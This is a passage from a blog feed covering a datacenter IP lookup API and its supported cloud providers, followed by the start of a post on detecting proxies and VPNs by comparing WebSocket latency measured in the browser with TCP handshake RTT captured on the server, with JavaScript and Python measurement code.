<p>And looking up an AWS IPv6 address: <a href="https://abs.incolumitas.com/datacenter?ip=2600:1F18:7FFF:F800:0000:ffff:0000:0000">https://abs.incolumitas.com/datacenter?ip=2600:1F18:7FFF:F800:0000:ffff:0000:0000</a>:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2600:1F18:7FFF:F800:0000:ffff:0000:0000"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As the example lookups above show, the API sometimes returns additional metadata for a specific IP address, such as regional and data center information.</p>
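<p>A minimal client-side sketch in Python of how such a lookup could be prepared and its response summarized. The endpoint and field names are taken from the examples above; the helper names <code>build_lookup_url</code> and <code>describe</code> are hypothetical, and treating <code>region</code> as optional is an assumption based on the GCP response shown earlier. The sketch does not perform the HTTP request itself.</p>

```python
import json
from urllib.parse import urlencode

# Endpoint as it appears in the example lookups above.
API_BASE = "https://abs.incolumitas.com/datacenter"


def build_lookup_url(ip):
    """Return the lookup URL for one IPv4 or IPv6 address (hypothetical helper)."""
    return API_BASE + "?" + urlencode({"ip": ip})


def describe(response_text):
    """Summarize a JSON response body; 'region' is assumed to be optional."""
    data = json.loads(response_text)
    summary = "{}: {}".format(data.get("ip", "?"), data.get("service", "unknown"))
    region = data.get("region")
    if region:
        summary += " ({})".format(region)
    return summary
```

<p>The response body could then be fetched with any HTTP client and passed to <code>describe</code> as text.</p>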
<h2>What cloud providers are supported by the API?</h2>
<p>Currently, the API supports IP address ranges from the following <a href="https://udger.com/resources/datacenter-list">cloud providers</a>:</p>
<table>
<thead>
<tr>
<th>Cloud Provider</th>
<th>Number of IP Addresses</th>
<th>API support</th>
</tr>
</thead>
<tbody>
<tr>
<td>Amazon AWS</td>
<td>124,353,848</td>
<td>✓</td>
</tr>
<tr>
<td>Microsoft Azure</td>
<td>12,175,189</td>
<td>✓</td>
</tr>
<tr>
<td>Google Cloud</td>
<td>13,257,728</td>
<td>✓</td>
</tr>
<tr>
<td>Alibaba Cloud</td>
<td>7,303,168</td>
<td>✗</td>
</tr>
<tr>
<td>SoftLayer Technologies / IBM Cloud</td>
<td>4,841,056</td>
<td>✓</td>
</tr>
<tr>
<td>Tencent Cloud</td>
<td>4,704,256</td>
<td>✗</td>
</tr>
<tr>
<td>OVH</td>
<td>4,200,608</td>
<td>✓</td>
</tr>
<tr>
<td>Digital Ocean, Inc</td>
<td>2,643,216</td>
<td>✓</td>
</tr>
<tr>
<td>Rackspace, Inc.</td>
<td>2,178,902</td>
<td>✗</td>
</tr>
<tr>
<td>Hetzner Online</td>
<td>2,022,193</td>
<td>✓</td>
</tr>
<tr>
<td>CloudFlare Inc</td>
<td>1,801,984</td>
<td>✓</td>
</tr>
<tr>
<td>Aptum Technologies</td>
<td>1,786,472</td>
<td>✗</td>
</tr>
<tr>
<td>Ubiquity Hosting</td>
<td>1,443,840</td>
<td>✗</td>
</tr>
<tr>
<td>Oracle Cloud</td>
<td>1,183,744</td>
<td>✓</td>
</tr>
<tr>
<td>Tor Network</td>
<td>?</td>
<td>✓</td>
</tr>
</tbody>
</table>
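<p>Conceptually, mapping an IP address to a provider comes down to checking it against a list of address ranges. The following is only a sketch of that idea with Python's standard <code>ipaddress</code> module, not the API's actual implementation. The ranges in <code>RANGES</code> are illustrative values chosen to cover the example IPs used earlier; they are not official provider data, and <code>find_provider</code> is a hypothetical helper.</p>

```python
import ipaddress

# Illustrative ranges only (assumption): chosen to cover the example IPs,
# NOT copied from any official provider source.
RANGES = {
    "AMAZON": ["3.5.140.0/22", "2600:1f18::/33"],
    "GCP": ["23.236.48.0/20"],
}

# Parse every CIDR string once so lookups only do membership checks.
NETWORKS = [
    (ipaddress.ip_network(cidr), name)
    for name, cidrs in RANGES.items()
    for cidr in cidrs
]


def find_provider(ip):
    """Return the provider name whose range contains ip, or None."""
    addr = ipaddress.ip_address(ip)
    for network, name in NETWORKS:
        # Only compare addresses and networks of the same IP version.
        if addr.version == network.version and addr in network:
            return name
    return None
```

<p>A linear scan like this is fine for a handful of ranges. With many thousands of ranges, a sorted or tree-based structure would likely be the better choice.</p>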
<p>The API database is updated every 4 hours with the official source of the IP address ranges of the cloud providers listed above (with a ✓). For some cloud providers such as OVH or Hetzner there is no official IP address range source, so I have to rely on <a href="https://bgp.he.net/search?search%5Bsearch%5D=OVH&commit=Search">third-party sources</a>.</p>Detecting Proxies and VPN's with Latency Measurements2021-06-07T20:00:00+02:002021-06-13T20:00:00+02:00Nikolai Tschachertag:incolumitas.com,2021-06-07:/2021/06/07/detecting-proxies-and-vpn-with-latencies/<p>VPN's and Proxy Servers can be detected by comparing latencies measured with JavaScript in the browser with the corresponding latency of the TCP/IP handshake on the server.</p><h2>TL;DR</h2>
<p>When collecting enough samples from latency measurements taken </p>
<ol>
<li>From within the browser with WebSockets by using JavaScript</li>
<li>And on the server side by measuring the RTT on the incoming TCP/IP handshake</li>
</ol>
<p>it is possible for a website to infer that the visitor is using a proxy/VPN if those two latency measurements differ significantly.</p>
<h2>Introduction</h2>
<p><strong>Premise:</strong> I am the owner of a hosted website and I have full control of my server (root rights). My server is not behind a load balancer or some other mechanism that prevents me from hooking into the incoming TCP/IP stream.</p>
<p><strong>Goal:</strong> For each visitor of my site, I want to detect whether some tunneling protocol such as a proxy server (SOCKS, HTTPS, ...) or a VPN service is being used. Why? Because a lot of spammers and scrapers use proxies and VPNs to hide their true IP address from websites.</p>
<p><strong>Visually:</strong> </p>
<figure>
<img src="https://incolumitas.com/images/proxy-latency.png" alt="Proxy Latency" />
<figcaption>Instead of using an img tag, I ended up using WebSockets to measure the latency from the browser.</figcaption>
</figure>
<p>Put differently, I want to take two latency measurements and compare them.</p>
<ol>
<li>Latency from <strong>browser -> web server</strong>, measured with JavaScript from the browser</li>
<li>Latency from <strong>external IP -> web server</strong>, measured on incoming TCP/IP handshake</li>
</ol>
<p>The idea is very simple: A proxy server between browser and web server has the effect that the TCP/IP connection is split in half and two TCP/IP streams are created as a result. Only the latter TCP/IP stream (and its source IP address) then communicates directly with my server. My conjecture is: It's possible to measure significant timing differences between <strong>browser -> web server</strong> and <strong>external IP -> web server</strong>.</p>
<h2>First Idea: Browser Latency with XMLHttpRequest</h2>
<p>Good resources regarding latency measurement with the DOM and JavaScript:</p>
<ol>
<li><a href="https://www.smashingmagazine.com/2011/11/analyzing-network-characteristics-using-javascript-and-the-dom-part-1/">Analyzing Network Characteristics Using JavaScript And The DOM</a></li>
<li><a href="https://stackoverflow.com/questions/43821243/measure-network-latency-time-to-first-byte-from-the-client-with-javascript">Measure network latency (time to first byte) from the client with JavaScript</a></li>
</ol>
<p>Without much explanation, this is the JavaScript source code I created in a first attempt to obtain the latency from browser to web server. Because the loop runs from <code>0</code> to <code>N</code> inclusive, it collects 11 measurements, and I use the median value.</p>
<div class="highlight"><pre><span></span><code><span class="kd">let</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">10</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">ping</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">started</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">http</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">cacheBuster</span> <span class="o">=</span> <span class="s1">'?bust='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span>
<span class="nx">url</span> <span class="o">+=</span> <span class="nx">cacheBuster</span><span class="p">;</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">url</span><span class="p">,</span> <span class="cm">/*async*/</span><span class="kc">true</span><span class="p">);</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">http</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ended</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">milliseconds</span> <span class="o">=</span> <span class="nx">ended</span> <span class="o">-</span> <span class="nx">started</span><span class="p">;</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">milliseconds</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">exception</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// this is expected</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">promises</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><=</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">promises</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">ping</span><span class="p">(</span><span class="s2">"https://incolumitas.com"</span><span class="p">));</span>
<span class="p">}</span>
<span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">promises</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">results</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">results</span><span class="p">.</span><span class="nx">sort</span><span class="p">((</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">=></span> <span class="nx">a</span> <span class="o">-</span> <span class="nx">b</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">median</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">m1</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">((</span><span class="nx">results</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">)</span> <span class="o">/</span> <span class="mf">2</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">m2</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">ceil</span><span class="p">((</span><span class="nx">results</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">)</span> <span class="o">/</span> <span class="mf">2</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">length</span> <span class="o">%</span> <span class="mf">2</span> <span class="o">==</span> <span class="mf">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">median</span> <span class="o">=</span> <span class="p">(</span><span class="nx">results</span><span class="p">[</span><span class="nx">m1</span><span class="p">]</span> <span class="o">+</span> <span class="nx">results</span><span class="p">[</span><span class="nx">m2</span><span class="p">])</span> <span class="o">/</span> <span class="mf">2</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">median</span> <span class="o">=</span> <span class="nx">results</span><span class="p">[</span><span class="nx">m1</span><span class="p">];</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'median'</span><span class="p">,</span> <span class="nx">median</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'measurements'</span><span class="p">,</span> <span class="nx">results</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">})()</span>
</code></pre></div>
<p>The above code gives me the following result on <code>incolumitas.com</code>:</p>
<div class="highlight"><pre><span></span><code><span class="nx">median</span> <span class="mf">126.5</span>
<span class="nx">measurements</span> <span class="p">[</span><span class="mf">41.5</span><span class="p">,</span> <span class="mf">91.5</span><span class="p">,</span> <span class="mf">108.70000000298023</span><span class="p">,</span> <span class="mf">121.19999999925494</span><span class="p">,</span> <span class="mf">124.89999999850988</span><span class="p">,</span> <span class="mf">126.5</span><span class="p">,</span> <span class="mf">126.70000000298023</span><span class="p">,</span> <span class="mf">130.09999999776483</span><span class="p">,</span> <span class="mf">130.19999999925494</span><span class="p">,</span> <span class="mf">145.10000000149012</span><span class="p">,</span> <span class="mf">145.5</span><span class="p">]</span>
</code></pre></div>
<p>However, there is a big problem. Using the <code>XMLHttpRequest</code> API to measure latencies gives inaccurate results. A substantial part of the measured time does not come from the round trip time, but from browser-internal networking overhead such as</p>
<ul>
<li>Resource Scheduling</li>
<li>Queueing</li>
<li>Connection start such as stalling, DNS lookup (negligible), initial connection, SSL</li>
</ul>
<p>What we really want is the <code>Waiting (TTFB)</code> part. See the image below taken from the Dev Console network tab: </p>
<figure>
<img src="https://incolumitas.com/images/requestTiming.png" alt="Waiting (TTFB)" />
<figcaption>I am only interested in the Waiting (TTFB) part.</figcaption>
</figure>
<p>For that reason, the <code>XMLHttpRequest</code> technique is not very promising and I need to look for a more accurate technique to measure latencies in the browser.</p>
<h2>Second Idea: Browser Latency with WebSockets</h2>
<p>Upon realizing the latency measurement problems with the <code>XMLHttpRequest</code> technique from above, it's time to try out WebSockets in order to get more accurate latency (RTT) measurements with JavaScript.</p>
<p>I am not interested in the WebSocket connection establishment latency; I only want the latency between the <code>socket.send()</code> and <code>socket.onmessage()</code> functions. All my WebSocket server does is send the message back. It's a simple echo server. On each <code>socket.send()</code>, I send the <code>performance.now()</code> relative timestamp to the server. That way, I can compute the latency when the server replies with a copy of the message.</p>
<p>The good thing with WebSockets: There is zero incentive to delay or stall WebSocket messages once the connection is established. This gives me accurate latency measurements.</p>
<p>This is the WebSocket latency measurement code and here is a link to the live test site: <a href="https://bot.incolumitas.com/ws-latency.html">https://bot.incolumitas.com/ws-latency.html</a>.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!doctype html></span>
<span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset </span><span class="o">=</span> <span class="s">"utf-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>WebSocket Latency Check<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name </span><span class="o">=</span><span class="s">"description"</span> <span class="na">content</span><span class="o">=</span><span class="s">"fu"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name </span><span class="o">=</span><span class="s">"author"</span> <span class="na">content</span><span class="o">=</span><span class="s">"NT"</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"data"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">function</span> <span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">num</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="o">+</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">round</span><span class="p">(</span><span class="nx">num</span> <span class="o">+</span> <span class="s2">"e+2"</span><span class="p">)</span> <span class="o">+</span> <span class="s2">"e-2"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getLatencyWebSocket</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">function</span> <span class="nx">median</span><span class="p">(</span><span class="nx">values</span><span class="p">){</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">values</span><span class="p">.</span><span class="nx">length</span> <span class="o">===</span><span class="mf">0</span><span class="p">)</span> <span class="k">return</span> <span class="mf">0</span><span class="p">;</span>
<span class="nx">values</span><span class="p">.</span><span class="nx">sort</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="nx">b</span><span class="p">){</span>
<span class="k">return</span> <span class="nx">a</span><span class="o">-</span><span class="nx">b</span><span class="p">;</span>
<span class="p">});</span>
<span class="kd">var</span> <span class="nx">half</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nx">values</span><span class="p">.</span><span class="nx">length</span> <span class="o">/</span> <span class="mf">2</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">values</span><span class="p">.</span><span class="nx">length</span> <span class="o">%</span> <span class="mf">2</span><span class="p">)</span>
<span class="k">return</span> <span class="nx">values</span><span class="p">[</span><span class="nx">half</span><span class="p">];</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">values</span><span class="p">[</span><span class="nx">half</span> <span class="o">-</span> <span class="mf">1</span><span class="p">]</span> <span class="o">+</span> <span class="nx">values</span><span class="p">[</span><span class="nx">half</span><span class="p">])</span> <span class="o">/</span> <span class="mf">2.0</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Create a Web Socket</span>
<span class="kd">const</span> <span class="nx">socket</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s1">'wss://abs.incolumitas.com:5555/'</span><span class="p">);</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">reject</span><span class="p">(</span><span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">());</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">messages</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">const</span> <span class="nx">latencies</span> <span class="o">=</span> <span class="p">[];</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">onopen</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">type</span><span class="o">:</span> <span class="s1">'ws-latency'</span><span class="p">,</span>
<span class="nx">ts</span><span class="o">:</span> <span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()),</span>
<span class="p">}));</span>
<span class="p">}</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">messages</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">data</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">messages</span><span class="p">.</span><span class="nx">length</span> <span class="o"><=</span> <span class="mf">5</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nb">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span>
<span class="nx">type</span><span class="o">:</span> <span class="s1">'ws-latency'</span><span class="p">,</span>
<span class="nx">ts</span><span class="o">:</span> <span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()),</span>
<span class="p">}));</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">messages</span><span class="p">.</span><span class="nx">length</span> <span class="o">-</span> <span class="mf">1</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">latencies</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">messages</span><span class="p">[</span><span class="nx">i</span><span class="o">+</span><span class="mf">1</span><span class="p">].</span><span class="nx">ts</span> <span class="o">-</span> <span class="nx">messages</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nx">ts</span><span class="p">));</span>
<span class="p">}</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">median</span><span class="p">(</span><span class="nx">latencies</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="nx">getLatencyWebSocket</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="nx">median</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'data'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">median</span><span class="p">;</span>
<span class="p">});</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>For example, when I access the above code with my own browser, I get a latency of <code>23.6ms</code>.</p>
<p>Those are very promising results. WebSockets don't suffer from the internal queuing and stalling issues that affect the <code>XMLHttpRequest</code> object. This gives us much more accurate data to work with. WebSockets are designed to support real-time networking applications, so the latency should be similar to the latency that we can measure on an incoming TCP/IP handshake.</p>
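<p>The timestamp arithmetic used by the page above can be restated compactly in Python: each message is sent as soon as the previous echo arrives, so the difference between consecutive echoed send timestamps approximates one round trip. This is only a sketch; the function names are hypothetical and any timestamps fed into it would be made-up sample values, not real measurements.</p>

```python
from statistics import median


def latencies_from_echoes(timestamps):
    """Differences between consecutive echoed send timestamps, in ms."""
    return [
        round(later - earlier, 2)
        for earlier, later in zip(timestamps, timestamps[1:])
    ]


def median_latency(timestamps):
    """Median round trip in ms, or 0 if fewer than two timestamps exist."""
    latencies = latencies_from_echoes(timestamps)
    return median(latencies) if latencies else 0
```

<p>Using the median rather than the mean keeps a single slow round trip from skewing the result.</p>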
<p><strong>Idea:</strong> If the latencies of the TCP/IP handshake and the WebSocket messages don't match within a very low margin of error, then there is likely a tunnel or proxy in between.</p>
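<p>A minimal sketch of that comparison in Python, assuming both sides have already collected a few samples in milliseconds. The function name <code>likely_tunneled</code> and the default <code>tolerance_ms</code> of 15 are arbitrary assumptions for illustration; a usable margin would have to be calibrated on real traffic.</p>

```python
from statistics import median


def likely_tunneled(browser_rtts_ms, handshake_rtts_ms, tolerance_ms=15.0):
    """Return True if the two median latencies differ by more than tolerance_ms.

    browser_rtts_ms:   WebSocket round trips measured in the browser
    handshake_rtts_ms: TCP/IP handshake RTTs measured on the server
    tolerance_ms:      assumed margin of error (arbitrary default)
    """
    gap = abs(median(browser_rtts_ms) - median(handshake_rtts_ms))
    return gap > tolerance_ms
```

<p>Comparing medians instead of single samples follows the premise from the TL;DR that enough samples have to be collected before drawing a conclusion.</p>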
<h2>Obtain External IP -> Web Server Latency with TCP/IP handshake RTT</h2>
<p>This is a bit more complex, because I have to hook into the raw TCP/IP handshake. Without much explanation, the Python script below does the job:</p>
<div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">pypacker</span> <span class="kn">import</span> <span class="n">ppcap</span>
<span class="kn">from</span> <span class="nn">pypacker.layer12</span> <span class="kn">import</span> <span class="n">ethernet</span>
<span class="kn">from</span> <span class="nn">pypacker.layer12</span> <span class="kn">import</span> <span class="n">linuxcc</span>
<span class="kn">from</span> <span class="nn">pypacker.layer3</span> <span class="kn">import</span> <span class="n">ip</span>
<span class="kn">from</span> <span class="nn">pypacker.layer4</span> <span class="kn">import</span> <span class="n">tcp</span>
<span class="kn">from</span> <span class="nn">pypacker.layer4</span> <span class="kn">import</span> <span class="n">ssl</span>
<span class="kn">from</span> <span class="nn">pypacker</span> <span class="kn">import</span> <span class="n">pypacker</span>
<span class="kn">import</span> <span class="nn">pcapy</span>
<span class="kn">import</span> <span class="nn">getopt</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">traceback</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="n">classify</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">interface</span> <span class="o">=</span> <span class="kc">None</span>
<span class="n">verbose</span> <span class="o">=</span> <span class="kc">False</span>
<span class="n">rtts</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">def</span> <span class="nf">updateFile</span><span class="p">():</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'writing RTTs2.json with </span><span class="si">{}</span><span class="s1"> objects...'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">rtts</span><span class="p">)))</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'RTTs2.json'</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fp</span><span class="p">:</span>
<span class="n">json</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">rtts</span><span class="p">,</span> <span class="n">fp</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">2</span><span class="p">,</span> <span class="n">sort_keys</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">signal_handler</span><span class="p">(</span><span class="n">sig</span><span class="p">,</span> <span class="n">frame</span><span class="p">):</span>
<span class="n">updateFile</span><span class="p">()</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">signal</span><span class="o">.</span><span class="n">signal</span><span class="p">(</span><span class="n">signal</span><span class="o">.</span><span class="n">SIGINT</span><span class="p">,</span> <span class="n">signal_handler</span><span class="p">)</span> <span class="c1"># ctrl + c</span>
<span class="n">signal</span><span class="o">.</span><span class="n">signal</span><span class="p">(</span><span class="n">signal</span><span class="o">.</span><span class="n">SIGTSTP</span><span class="p">,</span> <span class="n">signal_handler</span><span class="p">)</span> <span class="c1"># ctrl + z</span>
<span class="k">def</span> <span class="nf">tcpProcess</span><span class="p">(</span><span class="n">pkt</span><span class="p">,</span> <span class="n">layer</span><span class="p">,</span> <span class="n">ts</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Understand this: https://www.keycdn.com/support/tcp-flags</span>
<span class="sd"> from src -> dst, SYN</span>
<span class="sd"> from dst -> src, SYN-ACK</span>
<span class="sd"> from src -> dst, ACK</span>
<span class="sd"> I want the time between SYN-ACK and first ACK</span>
<span class="sd"> And then I want to record the </span>
<span class="sd"> """</span>
<span class="n">ip4</span> <span class="o">=</span> <span class="n">pkt</span><span class="o">.</span><span class="n">upper_layer</span>
<span class="n">tcp1</span> <span class="o">=</span> <span class="n">pkt</span><span class="o">.</span><span class="n">upper_layer</span><span class="o">.</span><span class="n">upper_layer</span>
<span class="c1"># SYN (1 bit): Synchronize sequence numbers. Only the first packet sent from each</span>
<span class="c1"># end should have this flag set. Some other flags and fields change meaning</span>
<span class="c1"># based on this flag, and some are only valid when it is set, and others when it is clear.</span>
<span class="k">if</span> <span class="n">tcp1</span><span class="o">.</span><span class="n">flags</span><span class="p">:</span>
<span class="n">label</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">key</span> <span class="o">=</span> <span class="s1">'</span><span class="si">%s</span><span class="s1">:</span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="n">pkt</span><span class="p">[</span><span class="n">ip</span><span class="o">.</span><span class="n">IP</span><span class="p">]</span><span class="o">.</span><span class="n">src_s</span><span class="p">,</span> <span class="n">pkt</span><span class="p">[</span><span class="n">tcp</span><span class="o">.</span><span class="n">TCP</span><span class="p">]</span><span class="o">.</span><span class="n">sport</span><span class="p">)</span>
<span class="k">if</span> <span class="n">key</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">rtts</span><span class="p">:</span>
<span class="n">rtts</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">=</span> <span class="p">{}</span>
